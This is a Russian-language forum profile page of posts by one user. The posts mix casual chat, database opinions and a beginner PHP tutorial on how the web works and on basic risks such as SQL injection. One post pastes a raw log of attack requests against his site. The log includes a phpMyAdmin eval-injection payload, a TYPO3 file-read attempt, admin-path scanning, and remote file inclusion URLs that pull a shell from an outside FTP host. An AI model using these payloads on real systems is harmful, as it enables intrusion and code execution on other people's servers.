Перейти к содержанию

nonlux

Пользователи
 Профиль  Обзор контента

  • Постов

    91

  • Зарегистрирован

  • Посещение

 Тип контента 

Весь контент nonlux

  1. nonlux
    estamolnia Ну и?
  2. nonlux
    Кстати, вот реальный пример того как, кому то сайтец насолил, и так четко посылает их шлюз доступа)), такая статистика набралась буквально за 2 дня. http://site/bitrix/admin/ http://www.site/wp-login.php http://site/wp-login.php http://site/stats http://site/webstat http://site/phpmyadmin/setup/index.php'>http://site/phpmyadmin/setup/index.php http://site/phpmyadmin/?_SESSION'>http://site/phpmyadmin/?_SESSION[ConfigFile][servers][*/foreach%28%24_GET+as+%24k%3D%3E%24v%29if%28%24k%3D%3D%3D%22eval%22%29eval%28%24v%29%3B/*][port]=0&session_to_unset=x&token= http://site/phpmyadmin/setup/config.php'>http://site/phpmyadmin/setup/config.php http://site/phpmyadmin/config/config.inc.php?eval=echo%20md5(123'>http://site/phpmyadmin/config/config.inc.php?eval=echo%20md5(123); http://site/forum/ http://site/forums/ http://site/index.php?jumpurl=typo3conf%2Flocalconf.php&juSecure=1&type=0&locationData=3%3A'>http://site/index.php?jumpurl=typo3conf%2Flocalconf.php&juSecure=1&type=0&locationData=3%3A http://site/engine/opensearch.php http://site/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php http://site/admin/banner_manager.php/login.php?action=insert'>http://site/admin/banner_manager.php/login.php?action=insert http://site/catalog/admin/banner_manager.php/login.php?action=insert http://site/memberlist.php http://site/f/memberlist.php http://site/forum/memberlist.php http://site/phpbb/memberlist.php http://site/3rdparty/ http://site/3rdparty/admin/ http://site/3rdparty/dbadmin/ http://site/3rdparty/myadmin/ http://site/3rdparty/phpMyAdmin/ http://site/3rdparty/pma/ http://site/3rdparty/pma2005/ http://site/3rdparty/setup.php http://site/~/admin/ http://site/admin/ http://site/admin/db/ http://site/administrator/admin/'>http://site/administrator/admin/ http://site/administrator/db/'>http://site/administrator/db/ http://site/administrator/phpmyadmin/'>http://site/administrator/phpmyadmin/ http://site/administrator/pma/'>http://site/administrator/pma/ http://site/administrator/web/'>http://site/administrator/web/ http://site/admin/phpmyadmin/ http://site/admin/pma/ http://site/admin/sqladmin/ http://site/admin/sysadmin/ http://site/admin/web/ http://site/bbs/data/ http://site/cpadmin/ http://site/cpadmindb/ http://site/cpanelmysql/ http://site/cpanelphpmyadmin/ http://site/cpanelsql/ http://site/cpdbadmin/ http://site/cpphpmyadmin/ http://site/database/ http://site/database/database/ http://site/database/phpmyadmin/ http://site/database/phpmyadmin2/ http://site/db/ http://site/dbadmin/ http://site/db/db-admin/ http://site/db/dbadmin/ http://site/db/dbweb/ http://site/db/myadmin/ http://site/db/phpmyadmin/ http://site/db/phpmyadmin2/ http://site/db/phpMyAdmin-2/ http://site/db/webadmin/ http://site/db/webdb/ http://site/db/websql/ http://site/~/myadmin/ http://site/myadmin/ http://site/mysql/ http://site/mysql-admin/ http://site/mysql/admin/ http://site/mysqladmin/ http://site/mysqladminconfig/ http://site/mysql/db/ http://site/mysql/dbadmin/ http://site/mysqlmanager/ http://site/mysql/mysqlmanager/ http://site/mysql/pma/ http://site/mysql/sqlmanager/ http://site/mysql/web/ http://site/~/phpadmin/ http://site/phpadmin/ http://site/~/phpmanager/ http://site/phpmanager/ http://site/phpmy/ http://site/phpmya/ http://site/~/phpmyadmin/ http://site/php-my-admin/ http://site/php-myadmin/ http://site/phpmy-admin/ http://site/phpmyadmin/ http://site/phpmyadmin1/ http://site/phpmyadmin2/ http://site/phpMyAdmin-2/ http://site/phpMyAdmin-2.2.3/ http://site/phpMyAdmin-2.2.6/ http://site/phpMyAdmin-2.5.1/ http://site/phpMyAdmin-2.5.4/ http://site/phpMyAdmin-2.5.5/ http://site/phpMyAdmin-2.5.5-pl1/ http://site/phpMyAdmin-2.5.5-rc1/ http://site/phpMyAdmin-2.5.5-rc1config/ http://site/phpMyAdmin-2.5.5-rc2/ http://site/phpMyAdmin-2.5.6/ http://site/phpMyAdmin-2.5.6-rc1/ http://site/phpMyAdmin-2.5.6-rc2/ http://site/phpMyAdmin-2.5.7/ http://site/phpMyAdmin-2.5.7-pl1/ http://site/phpMyAdmin-2.6.0/ http://site/phpMyAdmin-2.6.0-alpha/ http://site/phpMyAdmin-2.6.0-alpha2/ http://site/phpMyAdmin-2.6.0-beta1/ http://site/phpMyAdmin-2.6.0-beta2/ http://site/phpMyAdmin-2.6.0-pl1/ http://site/phpMyAdmin-2.6.0-pl2/ http://site/phpMyAdmin-2.6.0-pl3/ http://site/phpMyAdmin-2.6.0-rc1/ http://site/phpMyAdmin-2.6.0-rc2/ http://site/phpMyAdmin-2.6.0-rc3/ http://site/phpMyAdmin-2.6.1/ http://site/phpMyAdmin-2.6.1-pl1/ http://site/phpMyAdmin-2.6.1-pl2/ http://site/phpMyAdmin-2.6.1-pl3/ http://site/phpMyAdmin-2.6.1-rc1/ http://site/phpMyAdmin-2.6.1-rc2/ http://site/phpMyAdmin-2.6.2/ http://site/phpMyAdmin-2.6.2-beta1/ http://site/phpMyAdmin-2.6.2-pl1/ http://site/phpMyAdmin-2.6.2-rc1/ http://site/phpMyAdmin-2.6.3/ http://site/phpMyAdmin-2.6.3-pl1/ http://site/phpMyAdmin-2.6.3-rc1/ http://site/phpMyAdmin-2.6.4/ http://site/phpMyAdmin-2.6.4-pl1/ http://site/phpMyAdmin-2.6.4-pl2/ http://site/phpMyAdmin-2.6.4-pl3/ http://site/phpMyAdmin-2.6.4-pl4/ http://site/phpMyAdmin-2.6.4-rc1/ http://site/phpMyAdmin-2.7.0/ http://site/phpMyAdmin-2.7.0-beta1/ http://site/phpMyAdmin-2.7.0-pl1/ http://site/phpMyAdmin-2.7.0-pl2/ http://site/phpMyAdmin-2.7.0-rc1/ http://site/phpMyAdmin-2.8.0/ http://site/phpMyAdmin-2.8.0.1/ http://site/phpMyAdmin-2.8.0.2/ http://site/phpMyAdmin-2.8.0.3/ http://site/phpMyAdmin-2.8.0.4/ http://site/phpMyAdmin-2.8.0-beta1/ http://site/phpMyAdmin-2.8.0-rc1/ http://site/phpMyAdmin-2.8.0-rc2/ http://site/phpMyAdmin-2.8.1/ http://site/phpMyAdmin-2.8.1-rc1/ http://site/phpMyAdmin-2.8.2/ http://site/phpMyAdmin-3.1.3.1-all-languages/ http://site/phpMyAdmin-3.1.3.1/ http://site/phpMyAdmin-3.1.3.2-all-languages/ http://site/phpMyAdmin-3.1.3.2/ http://site/phpMyAdmin-3.1.5-all-languages/ http://site/phpMyAdmin-3.1.5/ http://site/phpMyAdmin-3.2.0.1-all-languages/ http://site/phpMyAdmin-3.2.0.1/ http://site/phpMyAdmin-3.2.0-all-languages/ http://site/phpMyAdmin-3.2.0/ http://site/phpMyAdmin-3.2.1-all-languages/ http://site/phpMyAdmin-3.2.1/ http://site/phpMyAdmin-3.2.2.1-all-languages/ http://site/phpMyAdmin-3.2.2.1/ http://site/phpMyAdmin-3.2.2-all-languages/ http://site/phpMyAdmin-3.2.2/ http://site/phpMyAdmin-3.2.3-all-languages/ http://site/phpMyAdmin-3.2.3/ http://site/phpMyAdmin-3.2.5-all-languages/ http://site/phpMyAdmin-3.2.5/ http://site/phpMyAdmin-3.3.0-all-languages/ http://site/phpMyAdmin-3.3.0/ http://site/phpMyAdmin-3.3.10-all-languages/ http://site/phpMyAdmin-3.3.10/ http://site/phpMyAdmin-3.3.1-all-languages/ http://site/phpMyAdmin-3.3.1/ http://site/phpMyAdmin-3.3.2-all-languages/ http://site/phpMyAdmin-3.3.2/ http://site/phpMyAdmin-3.3.4-all-languages/ http://site/phpMyAdmin-3.3.4/ http://site/phpMyAdmin-3.3.5.1-all-languages/ http://site/phpMyAdmin-3.3.5.1/ http://site/phpMyAdmin-3.3.5-all-languages/ http://site/phpMyAdmin-3.3.5/ http://site/phpMyAdmin-3.3.6-all-languages/ http://site/phpMyAdmin-3.3.6/ http://site/phpMyAdmin-3.3.7-all-languages/ http://site/phpMyAdmin-3.3.7/ http://site/phpMyAdmin-3.3.8.1-all-languages/ http://site/phpMyAdmin-3.3.8.1/ http://site/phpMyAdmin-3.3.8-all-languages/ http://site/phpMyAdmin-3.3.8/ http://site/phpMyAdmin-3.3.9.1-all-languages/ http://site/phpMyAdmin-3.3.9.1/ http://site/phpMyAdmin-3.3.9.2-all-languages/ http://site/phpMyAdmin-3.3.9.2/ http://site/phpMyAdmin-3.3.9-all-languages/ http://site/phpMyAdmin-3.3.9/ http://site/phpMyAdmin-3.4.0-all-languages/ http://site/phpMyAdmin-3.4.0/ http://site/phpMyAdmin-3.4.1-all-languages/ http://site/phpMyAdmin-3.4.1/ http://site/phpMyAdmin-3.4.2-all-languages/ http://site/phpMyAdmin-3.4.2/ http://site/phpMyAdmin-3.4.3.1-all-languages/ http://site/phpMyAdmin-3.4.3.1/ http://site/phpMyAdmin-3.4.3-all-languages/ http://site/phpMyAdmin-3.4.3/ http://site/phppma/ http://site/p/m/a/ http://site/pma/ http://site/~/PMA/ http://site/pma2005/ http://site/program/ http://site/qql/ http://site/roundcube/ http://site/sl2/data/ http://site/SQL/ http://site/sqladmin/ http://site/sqlmanager/ http://site/sql/myadmin/ http://site/sql/phpmanager/ http://site/sql/php-myadmin/ http://site/sql/phpmy-admin/ http://site/sql/phpMyAdmin/ http://site/sql/phpmyadmin2/ http://site/sql/sql/ http://site/sql/sql-admin/ http://site/sql/sqladmin/ http://site/sql/sqlweb/ http://site/sqlweb/ http://site/sql/webadmin/ http://site/sql/webdb/ http://site/sql/websql/ http://site/SSLMySQLAdmin/ http://site/typo3/phpmyadmin/ http://site/web/ http://site/webadmin/ http://site/webdb/ http://site/web/phpMyAdmin/ http://site/websql/ http://site/xampp/phpmyadmin/ http://site/zboard/include/write.php?dir=ftp://95.64.48.43/shell/shell_test.txt? http://site/bbs/include/write.php?dir=ftp://95.64.48.43/shell/shell_test.txt? http://site/include/write.php?dir=ftp://95.64.48.43/shell/shell_test.txt? http://site/oneadmin/config.php?path[docroot]=ftp://95.64.48.43/shell/shell_test.txt? http://site/index2.php?content=ftp://95.64.48.43/shell/shell_test.txt? http://site/phpopenchat/contrib/yabbse/poc.php?sourcedir=ftp://95.64.48.43/shell/shell_test.txt? http://site/contrib/yabbse/poc.php?sourcedir=ftp://95.64.48.43/shell/shell_test.txt? http://site/index.php?page=ftp://95.64.48.43/shell/shell_test.txt?'>http://site/index.php?page=ftp://95.64.48.43/shell/shell_test.txt? http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://95.64.48.43/shell/shell_test.txt? http://site/poll/admin/common.inc.php?base_path=ftp://95.64.48.43/shell/shell_test.txt? http://site/awstats/awstatstotals.php http://site/awstatstotals/awstatstotals.php http://site/index.php http://site/shop/admin/banner_manager.php/login.php?action=insert http://site/netcat/admin/ http://site/login.php http://site/mod/pages/tpl/pages_add.html http://site/common/js/lang/ru/te.js http://site/common/js/calendar.js http://site/ru/ http://site/en/ http://site/includes/init.php http://site/atilektcms/ http://site/atilektcms/login.aspx?ReturnUrl=/atilektcms/default.aspx http://site/boatilekt/login.aspx http://site/cgi-bin/djem/djemserver http://site/cgi-bin/djem/djemserver.cgi http://site/cgi-bin/djemserver http://site/cms/kernel/admin.php http://site/cms/admin/index.php http://site/_admin/ http://site/js/easy.php http://site/admin/content/sitetree/ http://site/domain/admin/ http://site/cgi-bin/CMS/getcontent.cgi?template=LoginPage&alias=nicht http://site/CMS/getcontent.cgi?template=LoginPage&alias=nicht http://site/textpattern/include/import/BloggerImportTemplate.txt http://site/manager/ http://site/manager/includes/accesscontrol.inc.php http://site/assets/index.html http://site/assets/cache/siteCache.idx.php http://site/core/packages/.gitignore http://site/hostcmsfiles/main.js http://site/engine/engine.php http://site/administrator/ http://site/typo3/border.html http://site/typo3/index.php http://site/t3lib/fonts/readme.txt http://site/admin/login.php http://site/?arthropodmanufacturerspenultimate http://site/?bootefficacylingered http://site/about/?bewarefreakishLen http://site/about/?sharpenedPresleybellyache http://site/index.html?cultmodifiablecarbon http://site/index.html?softballchickslusciousness http://site/contact/?precludednowhereEwen http://site/contact/?sternnessteachablefigure http://site/vin/?rattlersendangeredThai http://site/vin/?magnifyfashionMiddlesex
  3. nonlux
    Ну что, храбрые появятся?
  4. nonlux
    dibar, L0K1 +1 уГук. Довольно трудно придумать не трогая вообще технические детали.
  5. nonlux
    Обновил первый пост. Короче, посмотрим что получится, написал первое задание. Срок два-три дня.
  6. nonlux
    Как и обещал, правда с небольшим запозданием, написал, как рабают интренеты. Обновил первый пост.
  7. nonlux
    blackdevil Ой ты прав. ViktorOBM Прошу прошения, пост удалил. ViktorOBM Конечно можно, для начала попробуй сам разобраться, гугль в помощь. А я сегодня вечером, нарисую маленькую схемку, о том как же работают эти интернеты). Еще раз прошу прошения
  8. nonlux
    Как кое-где говорят, нло удалило это сообщении Пожалуй луна на меня сильно действует, а тяжелый рабочий день вообще выкрутил могзи Простите если обидел.
  9. nonlux
    Вот я о том что бы разобрать как это работает) Добавлено спустя 5 минут 48 секунд: А почему php? Мне нужен этот опыт в рамках php.
  10. nonlux
    L0K1 Извини но ты о чем? К чему линунс? По моему здесь не трольтема о том что круче win, lin, maс и иже с ними. php apache не понацея, это факт. но к чему это, если тема о том что бы построить как построить веб приложение на php и разобраться, как работают некоторые из движков. для нормальой разработки может быть и один человек, а может быть и сотня команд и что с этого. в первом посте просто описаны возможные роли. И к чему код http://video.gunlinux.org?
  11. nonlux
    Игра один из лучших способов обучения. По этому мы все будем учится, я одному вы другому)) Соревнование только в рамках реализации. то есть если ты придумаешь красивое решение то, твой код будет включен как часть движка) Если же твой код будет неудачен, то будут советы как сделать твой код, более понятным и будет оптимальнее решать задачи. Думаю мы постепенно буден внедрять новые элементы в наши правила, будем учится делать адекватное тестирование и рассмотрим которые методы рефракторинга. по поводу денвера я не против, но в итоге если у тебя не будет каких-то модулей дря apache или расширений и pear для php тебе придется разбираться и с этим. Например не знаярасширений которые тебе потребуются , ты можешь ошибиться в выборе хостинга.
  12. nonlux
    mr.unkind90 Я думаю этому здесь не место. Lelush,29a Спасибо за поддержку haha Это разные категории, и разные этапы разработки проэкта они не будут сравниваться между собой. bula3 Вот *112. Это как минимум по оптимазации, и по умению читать чужие сообщения. А вообще прочитай первый пост. Там ничего не сказано о том, о том что бы свои сайты сюда выкладывать.
  13. nonlux
    в правду толком ничего не написал))) Вообщем будем разбираться как сделать HandMade сайт. Будут даваться задачки, подробно описывающие что и зачем нужно. Каждый из участников игры будет писать код и выкладывать его на форум. В подведении итогов: по каждой задаче будут раздаваться и *109 Самый толковый код будет использован, как основа для следующих задач. Так же в подведении итогов будем рассматривать как подобный функционал реализован в нескольких популярных CMS И FRAMEWORK'S В конечном итоге игры мы получим много опыта, и вполне рабочую систему. Для начала игры надо набрать хотя бы человек 5, после этого будет дано 1 задание. А пока подготовительный этап, надо поставить с свой компютерик Apache и PHP.
  14. nonlux
    присоединяйся, задачи простые, авось и из тебя программист выйдет
  15. nonlux
    Предистория Дело было ночь, а спать не хотелось. Сон отбили кровавые ужасы, которые местами проскакивали на форуме. Он был совсем опечалет тем, что мало людей любят свой код, очень много людей хотят наварить деньги на лохах и при этом забывая, что этим самым они не просто выбрасывают в интернет-помойку еще один корявый помятый со всех сторон кусок г*вна. Хотя может это от незнания? кто делает сайты Вообще в нормальной команде для веб разрабтки можно выделить несколько ролей, программист серверной части-это чел, который пишит всякую хрень которая обрабатывает запросы браузера на сервере и выдает на них ответ, программист клиентской части-это чел, который пишет всякую хрень которую обрабатывает браузер и выполняет ее. сервер обычно ничего об этом не знает веб дезайнер это творческий чел, у него сильно выражен скил фотошопа, он мудрит всякие там интерфейсы, что бы пользователи совсем забыли зачем пришли на сайт верстальшик обычно ненавидит дизайнера, материт ie, и пытается подогнать крассивые пибабахи дизайнера, под какие либо стандарны еще конечно на этом список не заканчивается идея Вообщем будем разбираться как сделать HandMade сайт. Будут даваться задачки, подробно описывающие что и зачем нужно. Каждый из участников игры будет писать код и выкладывать его на форум. В подведении итогов: по каждой задаче будут раздаваться и *109 Самый толковый код будет использован, как основа для следующих задач. Так же в подведении итогов будем рассматривать как подобный функционал реализован в нескольких популярных CMS И FRAMEWORK'S в итоге В конечном итоге игры мы получим много опыта, и вполне рабочую систему. Предварительное задание Установить Apache+php Как-то так работают интернеты В глубокие далекости и технические тонкости сейчас углубляться не будем. Все устройства в Интернете соеденены между собой с помощью кабелей, с помощь WiFi, GPRS (вообще это не важно, как). И если совсем упростить то каждое устройство имеет свой уникальный адрес, называется он IP-адрес. Умные люди сделали так, что все эти соединенные устройства умеют общаться между собой, используя эти ip-адреса. Кроме этого они решили, что помимо адресов еще хорошо было бы использовать и какие-либо смысловые названия типа google.com, ulanovka.ru, и т.д. Их назвали доменными именами или доменами. И научили все устройства с помощью специальных сервисов( DNS ) определять какой же IP-адрес соответствует доменному имени. На компе много приложений которые хотят что-то делать в Интернете, браузер хочет порнушку посмотреть, скайп хочет звонок сделать, антивирь хочет обновления скачать. Но проводянка для Интернета одна!!! По этому придумали порты. С помощь них каждое приложение работает в как бы отдельном канале связи. Но при этом браузер у пользователя использует свой порт (например 1120), а сервер с порнушкой свой (80 порт). Сервера на которых живут сайты, работают по протоколу HTTP (протокол –это типа, алгоритма взаимодействия между компании, использующий определенные команды с помощью которых один комп втолдыкивает второму, что ему нужно и в каком виде). Порт на котором работают сервера по протоколу HTTP по умолчанию 80. Существует договоренность по которой определенные протоколы работают через определенным портам , обычно эти порты по умолчанию используют только серверными приложениями, а клиенты получают любой порт использующиеся их компьютером. Например список занятых портов в винде можно посмотреть C:\WINDOWS\system32\drivers\etc\services То есть в нашем примере IP-Адрес компа пользователя-120.12.100.2, Пользователь хочет посмотреть порнушку по адресу porno.ru, и он просит браузер ее показать. Комп спрашивает в Интернете, где живет porno.ru, Выглядит это как то так > google.ru DNS Сервер: UnKnown Address: 172.16.0.73 Имя : google.ru Addresses: 74.125.232.52 74.125.232.51 74.125.232.49 74.125.232.48 74.125.232.50nslookup Ему отвечают на 120.12.100.7, Браузер открывает новый порт – 1120 И отправляет запрос с помощью протокола http: Эй ты 120.12.100.7, на твоем порту 80, лежит сайт с порнушкой porno.ru, давай-ка мне его сюда. Я 120.12.100.2, мой порт 1120 В реальности запрос выглядит как-то так: Host: www.site.ru\r\n Referer: http://www.site.ru/index.html\r\n Cookie: income=1\r\n \r\nGET http://www.site.ru/news.html HTTP/1.0\r\n А сервер в ответ: На тебе 120.12.100.2, на порт 1120 все что пожелаешь. Date: Wed, 11 Feb 2009 11:20:59 GMT Server: Apache X-Powered-By: PHP/5.2.4-2ubuntu5wm1 Last-Modified: Wed, 11 Feb 2009 11:20:59 GMT Content-Language: ru Content-Type: text/html; charset=utf-8 Content-Length: 1234 Connection: close (далее следует запрошенная страница в HTML)HTTP/1.0 200 OK В итоге брузер загружает сайт пользователь видит Сиськи. Какие сиски реально видит, думаю каждый сам может представить ))) Как то так в общих словах работают интернеты. WWW Теперь углубимся в сторону веб. Браузер(internet explorer, opera, firefox,chrome) -эта такая программа, которая умеет передавать, принимать и обрабатывать сообщения протокола http. То что ищет браузер в Интернете по имении ulanovka.ru представляет собой компьютер, на котором постоянно работает приложение, оно называется веб-сервер. Главной задачей веб сервера является передача, прием и обработка сообщений протокола http. Примерами таких веб серверов могут быть, Apache,nginx, iis. Что бы не вникать в тонкости настройки, некоторые используют сборки, например Джентельменский набор разработчика Denver, или XAMMP. Лично я против использования таких сборок, хотя на первоначальном этапе это дает возможность получить готовый веб сервер у себя на компе нажатием левой кнопки мыши несколько раз. Получив запрос сервер по-умолчанию ищет файл который хочет увидеть пользователь, и отдает его. Например https://ulanovka.ru/uploads/images/avatars/gallery/ulanovka_gallery/000226.jpg Скорее всего, эта картинка лежит на сервере вот здесь: Папка где хранится сайт\forum\images\avatars\gallery\ulanovka_gallery\000226.jpg Так сложилось исторически, что сервер умеет только отдавать файлы. Поэтому когда в интернете бродили динозавры все работало именно так. Но разработчикам сайтов не хотелось писать миллионы статичных страничек. Они хотели написать один раз шаблончик сайта, а потом просто менять текстовое содержимое. И решили придумать языки программирования, которые облегчат их задачу. И научили веб сервера распознавать файлы с программами и выполнять их. Например: php, ruby, asp. Будем назвать их их серверными потому, что все программули написанные на этих языках выполняются на сервере и выдают готовый ответ пользователю. Очень часто приходится работать с большими объемами однотипных данных, например товары магазина с ценами. Эти данные, надо где-то хранить. Вот и придумали сервера баз данных, которые хранят, и обрабатывают данные. Веб используют разные сервера баз данных: mysql,firebird, mssql,oracle. Выбор конкретной базы данных зависит от требований к разрабатываемой системе. Итак сервер выдал нам какой-то ответ. Нажмите ctrl+U и увидите эту хрень. Это HTML. HTML- это не язык программирования!!!! Это способ разметить тест. Например - значит что это заголовок. Это значит абзац Значит список.По умолчанию, текст черный размер его какой-то не большой, фона нет. А дизайнерам хочется каких-нибудь финти-хрюшек. Вот и придумали CSS. Это набор привил оформления, Например, написав такое правило body{ color:#f00; } Мы сделаем весь текс на странице красным. Текс есть текст, в нем нет жизни. Но хочется же, что бы по клику по имени пользователя на ulanovke.ru я смог бы процитировать сообщение пользователя. Вот для таких вещей придумали языки программирования выполняющиеся в браузере, Например, js, Action Script,Silverlight. Некоторые из них требуют дополнительных плагинов для браузера,и представляют собой уже скомпилированные программы. А некоторые, передаются в браузер ввиде исходных кодов. И выполняются в нем. Вот как то так выглядит эти интеренты. На какие-то конкретные вопросы я могу ответить , но писать мануалы по установке Apache+php, как писать программы на php, да и вообще как писать программы не вижу смысла. Начинаем История 1 Все начинается с url. Проблема 1 В общем виде многие современные CMS, можно представить как большой черный ящик, в котором существует огромное количество возможностей как для разработчика, так и для злоумышлиника. При этом начинающие разработчики вообще не представляют, сколько всего доступно на сайте из вне. А проблема достаточно банальная. Допустим у нас есть сайт, index.php- отвечает за предоставление главной страницы обычным посетителям сайта. admin.php- панель администратора, в которой можно изменять контент главной страницы Доступные ссылки http://site/index.php'>http://site/index.php http://site/admin.php'>http://site/admin.php Если разработчики хотят добавить новую страницу на сайт, например контакты, им придётся Добавить еще один файл contact.php Но у нас же динамический сайт значит разработчики могут в файле index.php задать переменную которая будет отвечать за наполнение страницы. Аналогичным образом мы добавим несколько новых возможностей для администратора. И в итоге получим следующие доступные ссылки. http://site/index.php'>http://site/index.php вывод главной страницы http://site/index.php'>http://site/index.php?content=index аналогичная предыдущей ситуация http://site/?content=contact'>http://site/?content=contact страница с контактами http://site/ вывод главной страницы http://site/?content=index аналогичная предыдущей ситуация http://site/index.php'>http://site/index.php?content=contact страница с контактами http://site/admin.php'>http://site/admin.php вывод формы авторизации администратора http://site/admin.php'>http://site/admin.php?content=login аналогичная предыдущей http://site/admin.php'>http://site/admin.php?content=show_panel вывод -панели администратора http://site/admin.php'>http://site/admin.php?content=edit_page&page=index редактирование главной страницы http://site/admin.php'>http://site/admin.php?content=edit_page&page=contact редактирование страницы контактов. Вот сколько ссылок получается доступно любому пользователю Проблема первая заключается в том, что когда код написан не вами, или вами но очень давно не возможно со 100% уверностью сказать какие же url активны на сайте. Проблема 2 Вообще ради экономии ресурсов вместо логических названий используют идентафикаторы: Было http://site/index.php'>http://site/index.php?content=index- вывод главной страницы http://site/?content=contact'>http://site/?content=contact - страница с контактами стало http://site/index.php'>http://site/index.php?content=1 http://site/?content=2 запрос уменьшился но читаемость исчезла Вы наверное подумали так http://site/index.php'>http://site/index.php?content=1 - вывод главной страницы Если content хранится в базе данных | id | content | | 1 | наш телефон 22-22-22 | | 2 | Добро пожаловать на наш сайт | Как видите легко ошибится ) Проблема 3 http://site/?content= 1 - страница контактов. Здесь переменная content отвечает за то какая страница будет выведена Так как в нашем примере content берется из базы данных http://site/index.php'>http://site/index.php?content=1’ - такой url выдаст ошибку базы, если не обработать переменную content предварительно. Такая ошибка называется sql-инъекция. Злоумышленник при помощи нее сможет получить любые данные из ваше базы данных. В частности он получит пароли администратора, и крындец всему сайту)) А почему бы не проверить эту переменную? Да потому что, забыли. Сложно забыть когда переменная одна, http://site/?content= 1 А когда так http://site/?content= 1&user=12323&id_action=23&search=efrggfhhghffghfhfg&a=1&aaaa=4&asdad=3 Люди не машины они всегда допускают ошибки. Проблема 4 Допустим у нас на сервере лежит куча скриптов для обрабоки каких -либо задач Например del_page.php - у нас удаляет страницу с сайта. Что мешает любому пользователю обратится по адресу http://site/del_page.php Или например кофигурации на сайте хранятся в текстовом файле, что мешает пользователю обратится по ссылке, и узнать например пароли для подключения к базе данных. http://site/config.txt Немного об url Исторически сложилось что вот как-то выглядят ссылки http://site/saidjdfoijsdfoijosdwoiewjcdvjsdweo.php?adsoss_content=price&aoosd_sort=cost& assdos_order=asc Эта ссылка будет выводить табличку с товарами сортированную по цене. Попробуйте прямо сейчас ссылку быстро запомнить? А через месяц вспомните? Гораздо приятнее для взгляда и безопаснее сделать ссылку такой http://site/price/cost/asc/ Это называется ЧПУ( человеко понятный урл) согласитесь если страничка вам понравилась, но вы ее забыли добавить в закладки, то гораздо проще вспомнить хотя бы вот это http://site/price/ Постановка задачи Делаем обработчик всех приходящих запросов. Входные данные У нас есть настоящая ссылка вида /page/ Есть набор разрешенных ссылок / /contact/ /login/admin/ /admin/ На выходе ваш скрипт должен вернуть true или false. Так же можете писать свои мнения по поводу внедрения вашего скрипта. То есть как нам в итоге сделать так, чтобы наш скрипт фильтровал все входящие запросы. Рекомендации применяйте ООП.
  16. nonlux
    вообще есть такое слово, рефракторинг. Вот такой алкоритм действий: брутально пишешь код если не работает то делаешь рефракторинг если все равно не работает отправляешь код сюда, чесно очень сложно читать не причесанный код, особенно когла отладчик открыть нет ни возможности ни желания. а так на вскидку X[m] помоему у тебя из бинарного в линейный поиск затисался по секрету номер элемента будет i
  17. nonlux
    вот все и поутихли Trishy, Молодец осадила. хотя конечно я бы в некоторых моментах с тобою поспорил бы. но факт остается фактом, мышечкой да через гугль, хорошее приложение не построишь)))
  18. nonlux
    Я думаю эт уже оффтоп)))
  19. nonlux
    А Пиво? ))))) Шучу...
  20. nonlux
    Мое сообщение не направлено ни на разведение какого-либо срача на форуме, ни на унижение чьего-либо достоинства Mr.Potatoes не принимай близко к сердцу, но чую если я не скажу то ты так и будешь продолжать делать одну и туже хухню *54 По моему работа ГМно с технической стороны. Ты знаешь что такое валидация станиц, главная страница, даже обработаться не может. Ты исходный код страницы открывал?
  21. nonlux
    да я тоже не против пива попить, да с людьми познакомиться... на время уже много а информации о походе 0
  22. nonlux
    cообственно это и есть плюсы ФБ. Я с ФБ не оч долго работаю по этому ДАО ФБ, еще не постиг. А так вообще надо опираться не условия поставленной задачи, если веб то на хостинг и на используемый CMS или framework. И еще лучше использовать ORM независимый от базы данных
  23. nonlux
    ну на серве у мня выбор не большой Firebird, MySQL ,PostgreSQL Так что думаю что ФБ
  24. nonlux
    Для бесплатного хостинга наиболее доступной по до которых пор была MySQL. По этому помоему мускул это скорее исторически сложившийся, чем технологический лидер для веб. по моему главные минусы мускула перед птахой: [*:3288605701]foreing key только в innoDB, и то по моему как то криво работает [*:3288605701]тормозные представления, что вообще теряется смысл их использования [*:3288605701]большие объемы тяжело обрабатываются Текущий проект реализую с бд MySQL так как уж дампы мускла сильна отличаются от ФБ. А 20 ГБ конвертить довольно долго. Вообще я решил отказываться от Mysql в следующих проектах, благо этому легкому переходу способствует ORM контроллер.
  25. nonlux
    Спасибо. Не густо *93 А кабельное тв есть?
×
×
  • Создать...